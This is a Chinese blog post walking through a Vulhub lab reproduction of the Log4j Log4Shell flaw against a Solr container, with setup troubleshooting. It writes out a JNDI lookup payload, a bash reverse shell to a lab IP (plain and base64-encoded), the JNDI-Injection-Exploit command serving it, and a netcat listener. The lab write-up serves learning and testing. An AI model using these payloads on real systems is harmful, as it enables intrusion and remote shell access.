【vluhub】log4j注入漏洞 CVE-2021-44228

已于 2024-07-24 08:27:43 修改
阅读量664 收藏 5
点赞数 9
分类专栏: 靶场专场 文章标签: log4j python 开发语言
于 2024-07-23 17:23:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43372364/article/details/140639933
版权

LOG4介绍

是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布
log4j存在远程代码执行漏洞、受影响版本2.x

部署环境

攻击机环境:192.168.3.180

kail环境:192.168.203.12【NAT转换的】

部署vluhub

具体流程参考其他博主,本文主要讲解在部署vluhub过程中存在的几个问题,作为记录

问题一、apt-get install docker docker-compose,执行失败,下载失败,修改外网下载也失败

获取离线安装包

直通车

Releases · docker/compose · GitHub

具体版本

下载后存储至

赋予执行权限

sudo chmod +x /usr/local/bin/docker-compose

查看版本docker-compose -v

问题二、

wget https://github.com/vulhub/vulhub/archive/master.zip下载失败 

手动下载https://github.com/vulhub/vulhub/archive/master.zip

上传解压

unzip vulhub-master.zip

cd vulhub-master

问题三、docker compose up -d执行失败

由于修改vluhub外网导致,需要切换成国内网络

修改内容如下

重启服务

再次执行 docker compose up -d

端口8983搭建成功

地址访问

http://192.168.203.12:8983/solr/admin/cores?action=1

 验证是否存在漏洞

DNSLog Platform

 

替换发送请求

http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}

 刷新dns右边这个按钮 出现下方内容则存在

 bash -i >& /dev/tcp/192.168.3.180/6666 0>&1

反向getshell base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==

获取JNDI包

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

 

执行

 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.3.180

生成获取ldap内容 有用

创建监听nc-lvvp 6666异常由于windwos 没有安装nc需要安装

直通车

 netcat 1.11 for Win32/Win64

安装后火绒会报毒,运行

然后在该路径下执行  nc-lvvp 6666

将生成ldap内容复制替换,重新刷新一下接口

http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}

 getshell了

大概就是这么个流程!

 哦 最后一步移除环境

docker-compose down

参考:

centos离线安装docker,docker-compose_centos离线安装docker-compose-CSDN博客

Log4j漏洞环境搭建以及复现拿getshell_dockerlog4j环境搭建-CSDN博客

securitor
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Log4j CVE-2021-44228 漏洞及Spring Boot解决方案
oscar999的专栏
12-17 2053
Log4j 的2 到 2.14 版本最近爆出了一个比较大的漏洞漏洞编号是CVE-2021-44228。本篇对该漏洞进行简单介绍, 并介绍Spring Boot项目如何解决该漏洞
Log4j CVE-2021-44228后续-CVE-2021-45046,CVE-2021-45105
oscar999的专栏
12-20 1132
Log4j 发现远程代码攻击漏洞CVE-2021-44228 )之后, Apache 随即发布了 2.15.0版本, 但是发布的这个版本在线程上下文查找依旧存在远程代码攻击漏洞CVE-2021-45046),于是随后又发布了 2.16.0版本; 不幸的是,两天后,Log4j 又被发现了DOS(拒绝服务)的漏洞CVE-2021-45105), 于是又发布了2.17.0 版本, 截止目前位置, Log4j 在Java 8的**安全版本是2.17.0 **。
【vulhub】Log4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2820
【vulhub】Log4j2:CVE-2021-44228漏洞复现
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6020
log4j 漏洞CVE-2021-44228 漏洞复现
Log4J2漏洞CVE-2021-44228)原理
m0_62466350的博客
05-07 2626
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发 者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
Log4j漏洞CVE-2021-44228原理以及漏洞复现【vulhub】
m0_55854679的博客
08-17 853
文章目录 漏洞概述 关于JNDI 关于RMI 影响版本 漏洞检测 漏洞复现 漏洞预防
log4j2 CVE-2021-44228 远程代码执行漏洞
读书 买花 长大
05-17 570
CVE-2021-44228
Log4j2注入漏洞CVE-2021-44228)漏洞复现
m0_58596609的博客
10-10 1851
Log4j2注入漏洞CVE-2021-44228)漏洞复现
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 6938
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码来远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
C++那些事之依赖注入
Francis的博客
07-18 1014
C++那些事之依赖注入最近星球里面有个小伙伴让更新一下依赖注入,于是写出了这篇文章,来从实际的例子讲解,本文会讲解一些原理与实现,完整的实现代码懒人版放在星球中,我们开始正文。大纲:直接依赖接口依赖注入模版依赖注入依赖注入是一种常用的设计模式,通常会采用接口/模版的方式提高代码的可测性与维护性,下面我们来举个例子。假设有一个用户服务类UserService,需要通过HTTP客户端与远程服务器进行通...
探索PyCharm的单元测试世界:高效运行与调试指南
最新发布
2401_85761003的博客
07-23 287
通过本文的介绍,你应该对如何在PyCharm中运行和调试单元测试有了全面的了解。掌握这些技能,你将能够更高效地编写和维护高质量的代码。记住,单元测试是软件开发过程中的重要组成部分,它有助于提高代码的可靠性和可维护性。注意:本文中的代码示例仅供参考,实际使用时请根据你的项目情况进行调整。如果你有任何问题或需要进一步的帮助,请随时联系我们。
java之log4j反序列化
weixin_45653478的博客
07-20 1091
Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端获取对应的Class文件,使用ClassLoader在本地加载Ldap服务端返回的Class类。
.NET单元测试使用AutoFixture按需填充的方法总结
这是一个web全栈开发的博客,取其精华去其糟粕,争取让大家一看就懂,一学就会,一用就成~
07-19 670
是一个.NET库,旨在简化单元测试中的数据设置过程。通过自动生成测试数据,它帮助开发者减少测试代码的编写量,使得单元测试更加简洁、易读和易维护。AutoFixture可以用于任何.NET测试框架,如xUnit、NUnit或MSTest。如果直接使用生成的User对象,他会默认给你填充Id为随机整数,Name和Email为一串Guid,显然这里的邮箱地址生成就不能满足要求,并不是一个有效的邮箱格式那么如何让AutoFixture按需生成有效的测试数据呢?
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值